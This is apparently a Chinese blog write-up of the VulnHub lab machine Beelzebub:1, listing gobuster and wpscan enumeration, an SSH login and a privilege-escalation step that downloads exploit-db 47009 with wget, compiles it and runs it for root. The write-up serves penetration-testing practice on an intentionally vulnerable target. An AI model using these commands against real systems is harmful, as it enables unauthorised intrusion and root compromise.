vlnhub之Beelzebub :1

最新推荐文章于 2024-06-20 20:07:33 发布
最新推荐文章于 2024-06-20 20:07:33 发布
阅读量414 收藏
点赞数 2
分类专栏: 网络安全 文章标签: php 系统安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qwweggfe/article/details/120487201
版权

0X001 简介

我们在下载靶机时会有这样的提示:您必须尽可能多地枚举并且不要忘记 Base64。说明我们要使用base64,他主要是对Beelzebub进行base64编码,然后可以访问到新的页面,下面是我的一系列操作。

0X002 渗透过程

首先我进行IP扫码,获取靶机的ip地址

我们查看这个ip的端口开启了哪些服务

 发现他是使用的apache 2.4.29进行搭建的,于是我打开这个网页

 我们看一看他有没有子目录

gobuster dir -r -u http://192.168.181.169/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,bak

 于是我在/index.php页面的源码页面给我们了一些提示

 于是对其进行mds编码

echo -n beelzebub | md5sum

 

 于是打开网页进行查看

发现他进行了页面的跳转, 那我想他会不会在这个页面下有一些子目录呢,于是进行目录扫描

gobuster dir -r -u http://192.168.181.169/d6bf00c767d95fcd6bc40fad7ead64cc --wordlist /usr/share/seclists/Discovery/Web-Content/big.txt -x php,html,txt

 

 什么也没有,于是我想到了wordpress CMS了解他到WP-CMS – WordPress 插件 | WordPress.org China 简体中文

进行查看,于是我使用wpscan进行查看

wpscan --url http://192.168.181.169/d18e1e22becbd915b45e0e655429d487/ -e --plugins-detection aggressive --ignore-main-redirect --force --api-token xxxxxxxxx

 我发现了两个用户

 还有三个子目录

 在查看的工程中,发现只有/wp-content/uploads/可以访问

 发现他还有一个目录可以查看/Talk To VALAK

 于是发现了登录的密码

 于是进行ssh登录

 登录成功于是进行提权

首先我们当然是查看历史记录了

cat .bash_history

wget https://www.exploit-db.com/download/47009

mv 47009 ./exploit.c

gcc exploit.c -o exploit

./exploit

 于是获得root权限

获得最终的flag

 

我带的我们
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
(Vulnhub靶场)BEELZEBUB: 1 write up
weixin_44588899的博客
05-24 456
文章目录环境准备信息搜集漏洞利用权限提升 环境准备 靶机地址:https://www.vulnhub.com/ kali攻击机ip:192.168.220.128 靶机 ip: 靶机地址: 使用命令: arp-scan -l 探测发现是:192.168.220.134 信息搜集 nmap -T4 -p- -A 192.168.220.134 发现开放22、80端口, 打开web页面发现是apache默认页面,直接dirb扫描一下目录 dirb http://192.168.220.134 .
【Vulnhub靶场】BEELZEBUB: 1
DG_s1mple
03-25 4029
环境准备 下载靶机导入到vmware 靶机的IP地址为:192.168.2.22 攻击机IP地址为:192.168.2.18 信息收集 我们使用nmap扫描一下靶机开放的端口信息 靶机开放了ssh跟http服务,并且apache版本号为2.4.29(这个待会儿有用,先记着 ) 我们访问一下他的网站看看 是默认网页,我们使用工具扫描一下 我们挨个访问一下,先访问一下index.php 发现apache跟刚刚不一样,为2.4.30,猜测可能是自己写的页面,我们查看一下源代码 My heart wa
【VulnHub靶场】——BEELZEBUB: 1
Demo不是emo的博客
09-25 1万+
​ 今天写一份BEELZEBUB: 1靶场教程(简单难度),靶场环境来源于VulnHub,该网站有很多虚拟机靶场,靶场入口在这,推荐大家使用,大家进去直接搜索BEELZEBUB: 1就能下载今天的靶场了,也可以找我拿,话不多说进入正题
VulnHub日记(十三):Beelzebub:1
Dawn_Xi的博客
10-12 592
靶机介绍 虚拟机链接:Beelzebub: 1 ~ VulnHub 参考博客:Beelzebub Writeup - Vulnhub - Walkthrough - Security 开始练习 本机ip:192.168.60.130 目的机ip:192.168.60.131 netdiscover找到ip netdiscover -r 192.168.60.0/24 nmap扫描开放服务端口 nmap -A 192.168.60.131 访问80口,dirsearch枚举..
Vulnhub-BEELZEBUB: 1
Re1_zf的博客
02-01 232
1、目录扫描很重要,尤其是响应码,很有可能有静态页面存储信息的情况,仔细核查200响应码页面2、一串无从下手的字符串可以在目录上尝试一下3、关键页面,尤其是有信息交互的页面,如果没有明显的可利用信息,可以注意一下页面的cookie,有可能就藏着敏感信息,还需要注意,有的时候也需要交互一下再去查看4、phpmyadmin那个估计就是兔子洞了,像OSCP中就需要注意这种兔子洞,会浪费很长时间5、wordpress的神器-wpscan,利用好的话简直无敌。
Beelzebub:文件之王-一种业余操作系统
02-03
别西卜 ... 另外,使用GNU Make时,您感兴趣的输出文件是/build/beelzebub.amd64.x86.iso ,使用/build/beelzebub.amd64.x86.iso时是.vmake\amd64.debug\beelzebub.amd64.debug.iso beelzebub.amd64.
“如果我被Beelzebub驱逐出魔鬼,……”:关于网络故障的恶作剧-研究论文
05-19
在经历了关于商业网络优势的第一个欣欣向荣的阶段之后,现在有许多报告证明了它们令人困惑的过度复杂性。 网络故障是多方面的:大量的环境信息,协调封锁,严重的接口问题,永久性决策冲突,不对称的权力关系,节点...
右键菜单添加“打开cmd” reg文件
05-12
最近使用cmd比较多,就想在某个文件夹下右键打开cmd,这样不用每次都在默认情况下切换目录。无奈win10 1703版本下shift+右键不能打开cmd,只能...from:https://blog.csdn.net/Mr_BEelzebub/article/details/78776104
Vulnhub靶机:Beelzebub 1
qq_48904485的博客
01-07 367
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:Beelzebub:1(10.0.2.9)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/beelzebub-1,742/
靶机渗透练习34-Beelzebub
hirak0的博客
04-18 535
靶机描述 靶机地址:https://www.vulnhub.com/entry/beelzebub-1,742/ Description Difficulty: Easy You have to enumerate as much as you can and don’t forget about the Base64. For hints add me on Twitter- ShauryaSharma05 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:
vulnhub 入门DC-1
weixin_52780973的博客
12-31 326
vulnhub靶场 入门 DC-1 攻防
Vulnhub靶机实战-PRESIDENTIAL
黑白的博客
01-10 1184
声明 好好学习,天天向上 搭建 vulnhub官网下载完镜像后,用vmware打开,遇到错误点击重试,即可,选择NAT后,直接就DHCP了 注意一点,vmware的兼容性,有问题,我用vmware,反弹shell和提权的时候,惨遭失败,一定要用oracle virtualbox,一定一定一定 vmware我用的桥接,virtualbox用的仅主机网卡#2,调了一下本机的网卡,调了半天,两边才能互相ping通 信我一句话,这非技术问题困了我好几天,弄不出来,vulnhub首页说建议用virtualbox,又说
vulhub下载及使用(小宇特详解)
小宇的web博客
04-14 9459
vulhub下载及使用(小宇特详解) 1.了解vulhub Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。 2.下载vulhub git clone https://github.com/vulhub/vulhub.git 3.打开vulhub,先cd到vulhub,再查看上级目录。 4,启动环境,随便进入一个目录,cd spring/CVE-2018-1
vulnhub靶机之dawn
timesleep的博客
12-05 839
首先确定我们的IP 我们的靶机IP为192.168.34.160 kali的IP为192.168.34.175 那我们首先扫描端口 1234这个端口是我们之前做的时候留下的 我们看到了有80这个端口我们访问一下 好我们扫一下目录 我们访问一下 我们发现了日志文件我们看一下 然后我们继续看靶机的其它端口如,139,445有没有可利用的 我们看到还有一个ITDEPT的共享目录我们去看一下发...
Vulnhub靶机渗透测试实战(一):DC-1(入门)
热门推荐
weixin_41038469的博客
03-11 2万+
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: macOS10.13 安装好虚拟机后挂载Virtualbox运行 第一次进行渗透实战演练,打开虚拟机后发现需要登录密码,一脸懵逼。翻查网页上的介绍才知道,就是不...
教你怎么用Vulnhub来搭建环境
大方子
09-22 2万+
0x01 前言 Vulnhub它是一个提供各种漏洞环境的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 如果只是练习一些常见的漏洞可以看我另外两篇用Docker来搭建各种漏洞靶场(妈妈再也不用担心我没有靶场练习了)从CentOS安装Docker来搭建漏洞靶场到Joomla 3.4.5 反序列化漏洞复现(附批量Getshell脚本) 0x02 下载 https:/...
深入了解PHP的If...Else语句
最新发布
Perfect—完美的博客
06-20 486
if…else语句用于根据条件执行不同的代码块。if (条件) {// 当条件为真时执行的代码} else {// 当条件为假时执行的代码if…else语句是PHP中最基础也是最重要的控制结构之一。通过使用if、if…else、if…elseif…else以及嵌套if语句,可以实现复杂的条件判断逻辑。条件运算符和switch语句提供了更加简洁和高效的代码写法。掌握这些控制结构的用法,将有助于你编写更加灵活和健壮的PHP代码。
Linux-安装及管理程序
A6985HG的博客
06-19 737
定义:本地Yum源是指将软件包存储在本地服务器或存储设备上的源。这些软件包可以是从官方源下载后本地存储的,也可以是用户自己编译的软件包。优点:本地Yum源的主要优势在于访问速度和可控性。由于软件包位于本地网络或服务器上,因此安装和更新速度快,尤其是在没有稳定互联网连接或需要大规模部署的情况下更为实用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值